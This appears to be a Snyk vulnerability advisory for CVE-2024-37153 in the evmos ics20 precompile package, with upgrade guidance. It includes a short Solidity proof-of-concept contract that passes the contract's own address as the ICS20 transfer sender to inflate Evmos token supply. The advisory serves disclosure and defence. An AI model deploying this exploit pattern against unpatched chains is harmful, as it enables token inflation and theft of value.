Session Fixation Affecting github.com/evmos/evmos/v18/precompiles/ics20 package, versions <18.1.0
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.05% (20th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-GOLANG-GITHUBCOMEVMOSEVMOSV18PRECOMPILESICS20-7222574
- published 9 Jun 2024
- disclosed 6 Jun 2024
- credit Vvaradinov
Introduced: 6 Jun 2024
CVE-2024-37153 Open this link in a new tabHow to fix?
Upgrade github.com/evmos/evmos/v18/precompiles/ics20 to version 18.1.0 or higher.
Overview
Affected versions of this package are vulnerable to Session Fixation due to the improper handling of contract balances during interchain transactions involving a local state change and an ICS20 transfer. An attacker can exploit this flaw to artificially increase the supply of Evmos tokens by manipulating the sender parameter in the ICS20 transfer function. This is only exploitable if the contract address is used as the sender in an ICS20 transfer.
PoC
// This function does not reduce the contract balance correctly but liquid stakes correctly
function transfer(
string memory sourcePort,
string memory sourceChannel,
string memory denom,
uint256 amount,
string memory receiver,
string memory evmosReceiver
) external returns (uint64 nextSequence) {
counter += 1; # Only happens when there is a local state update together with an ICS20 Transfer
Height memory timeoutHeight = Height(100, 100);
string memory memo = buildLiquidStakeMemo(receiver, evmosReceiver);
return ICS20_CONTRACT.transfer(
sourcePort,
sourceChannel,
denom,
amount,
address(this), # this is the sender address which is the contract
receiver,
timeoutHeight,
0,
memo
);
}
References
CVSS Scores
version 3.1